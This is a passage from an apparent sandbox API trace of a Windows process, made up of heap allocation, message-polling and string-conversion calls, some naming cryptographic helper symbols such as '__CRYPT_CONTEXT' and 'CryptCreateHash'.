wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0144.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0144.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0144.192] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0144.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0144.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0144.192] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0144.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0144.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0144.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0144.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0144.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0144.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0144.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0144.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0144.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0144.193] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0144.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0144.193] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0144.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0144.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0144.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0144.193] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0144.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0144.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0144.193] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0144.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0144.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0144.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0144.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0144.194] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0144.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0144.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0144.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0144.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0144.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0144.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0144.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0144.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0144.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0144.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0144.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0144.194] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0144.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0144.194] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0144.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0144.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0144.194] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0144.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0144.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0144.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0144.195] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0144.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.195] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0144.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0144.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0144.195] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0144.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0144.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0144.195] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0144.195] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0144.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0144.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0144.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0144.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0144.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0144.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0144.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0144.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0144.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0144.196] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0144.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0144.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0144.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0144.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0144.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0144.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0144.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0144.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0144.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0144.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0144.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0144.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0144.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0144.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0144.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0144.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0144.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0144.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0144.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0144.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0144.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0144.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0144.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0144.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0144.197] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0144.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0144.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a58 [0144.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0144.198] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0144.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0144.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0144.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0144.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0144.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0144.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0144.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0144.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0144.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0144.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0144.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0144.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0144.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0144.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0144.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0144.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0144.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0144.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0144.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0144.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0144.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0144.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0144.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0144.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0144.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0144.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0144.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0144.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0144.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0144.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0144.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0144.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0144.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0144.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0144.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0144.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0144.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0144.200] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0144.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0144.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0144.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0144.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0144.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0144.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0144.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0144.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0144.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0144.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0144.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0144.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0144.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0144.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0144.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0144.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0144.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0144.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0144.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0144.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0144.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0144.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0144.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0144.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0144.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0144.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0144.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0144.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0144.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0144.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0144.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0144.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0144.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0144.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0144.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0144.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0144.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0144.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0144.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0144.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0144.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0144.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0144.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0144.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0144.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0144.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0144.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0144.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0144.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0144.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0144.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0144.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0144.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0144.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 